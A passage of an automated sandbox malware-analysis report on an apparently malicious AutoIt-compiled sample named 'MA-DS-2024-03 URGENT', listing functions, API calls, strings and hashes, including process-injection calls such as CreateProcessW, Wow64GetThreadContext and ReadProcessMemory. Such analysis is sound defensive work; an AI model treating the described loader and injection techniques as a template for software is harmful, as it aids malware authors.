                                                        • Instruction Fuzzy Hash: 4DA10774E00609EBDB24CFA4C898BEEBBB5FF48305F208599E505BB280D7799E51CB54
                                                        Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2143 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                        • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                        • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                        • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                        • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                        • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8
                                                        Function 00B65378 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2496 b65378-b654c2 call b62fc8 call b65268 CreateFileW 2503 b654c4 2496->2503 2504 b654c9-b654d9 2496->2504 2505 b65579-b6557e 2503->2505 2507 b654e0-b654fa VirtualAlloc 2504->2507 2508 b654db 2504->2508 2509 b654fe-b65515 ReadFile 2507->2509 2510 b654fc 2507->2510 2508->2505 2511 b65517 2509->2511 2512 b65519-b65553 call b652a8 call b64268 2509->2512 2510->2505 2511->2505 2517 b65555-b6556a call b652f8 2512->2517 2518 b6556f-b65577 ExitProcess 2512->2518 2517->2518 2518->2505
                                                        APIs
                                                          • Part of subcall function 00B65268: Sleep.KERNEL32(000001F4), ref: 00B65279
                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B654B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: J3EPKQ8O28TT1U692APD3SA1HY
                                                        • API String ID: 2694422964-2513293158
                                                        • Opcode ID: 743b2e8f030bef22c5e3506cf72cabdff9867a2912651af369ffd27054586d60
                                                        • Instruction ID: bb1ef3e603be236aadb948e1c33306e07bae0e73f5acd6c9ab4f65978e8abda5
                                                        • Opcode Fuzzy Hash: 743b2e8f030bef22c5e3506cf72cabdff9867a2912651af369ffd27054586d60
                                                        • Instruction Fuzzy Hash: 65618130D04288EAEF11DBB4C858BEEBBB99F15304F044199E2497B2C1D7B91B49CBA5
                                                        Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2520 40407c-404092 2521 404098-4040ad call 407a16 2520->2521 2522 40416f-404173 2520->2522 2525 4040b3-4040d3 call 407bcc 2521->2525 2526 43d3c8-43d3d7 LoadStringW 2521->2526 2529 43d3e2-43d3fa call 407b2e call 406fe3 2525->2529 2530 4040d9-4040dd 2525->2530 2526->2529 2539 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2529->2539 2542 43d400-43d41e call 407cab call 406fe3 call 407cab 2529->2542 2532 4040e3-4040e8 call 407b2e 2530->2532 2533 404174-40417d call 408047 2530->2533 2532->2539 2533->2539 2539->2522 2542->2539
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        • _memset.LIBCMT ref: 004040FC
                                                        • _wcscpy.LIBCMT ref: 00404150
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 3942752672-1585850449
                                                        • Opcode ID: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                                                        • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                                        • Opcode Fuzzy Hash: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                                                        • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                                        Function 00B64268 Relevance: 8.2, APIs: 5, Instructions: 720processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 00B64A23
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00B64AB9
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B64ADB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                        • Instruction ID: 82f9a5158bb22a3c63f430dd9228beebe116678a62fa181b8a890040e0be64e1
                                                        • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                        • Instruction Fuzzy Hash: F562E930A146589BEB24CFA4C851BDEB376FF58300F1091A9D10DEB390E77A9E81CB59
                                                        Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                        • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                                        • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                        • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                                        Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                        • _free.LIBCMT ref: 0043E263
                                                        • _free.LIBCMT ref: 0043E2AA
                                                          • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                        • API String ID: 2861923089-1757145024
                                                        • Opcode ID: 8e336f0d69a657f93682824d12846feb57342a83311b056c997625f77a5515d3
                                                        • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                                        • Opcode Fuzzy Hash: 8e336f0d69a657f93682824d12846feb57342a83311b056c997625f77a5515d3
                                                        • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                                        Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                        • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                        • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                                        • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                        • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                        Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                        • _free.LIBCMT ref: 004696A2
                                                        • _free.LIBCMT ref: 004696A9
                                                        • _free.LIBCMT ref: 00469714
                                                          • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                          • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                        • _free.LIBCMT ref: 0046971C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                                        • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                        Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                        • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                        Function 0167B180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointerEx.KERNEL32 ref: 0167B2BA
                                                        • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 0167B2E0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: File$PointerWrite
                                                        • String ID:
                                                        • API String ID: 539440098-0
                                                        • Opcode ID: d887c29e45b482c1aaef1890db3604ee44a020c03872a26be473ed2a22b1bb7a
                                                        • Instruction ID: e94ba68c5c02bbbf6d31bdd264d6cd2fc06f2e03dbcd799bdaa26eb17adefcf5
                                                        • Opcode Fuzzy Hash: d887c29e45b482c1aaef1890db3604ee44a020c03872a26be473ed2a22b1bb7a
                                                        • Instruction Fuzzy Hash: E331A27050D384AEE7128B6D8C1973FBFE06F82625F48854DE9D4C7381D3B8844887A3
                                                        Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: AU3!P/I$EA06
                                                        • API String ID: 4104443479-1914660620
                                                        • Opcode ID: 8014d3fb356ffbf6754ed2c01cea3d798000f8d72259ce0527afa311c47bbb91
                                                        • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                        • Opcode Fuzzy Hash: 8014d3fb356ffbf6754ed2c01cea3d798000f8d72259ce0527afa311c47bbb91
                                                        • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                        Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0043EA39
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                                          • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                          • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X
                                                        • API String ID: 3777226403-3081909835
                                                        • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                        • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                        • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                        • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                        Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                        • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                        • Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                        • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                        Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                        • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                        • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                        • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                        Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                        • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
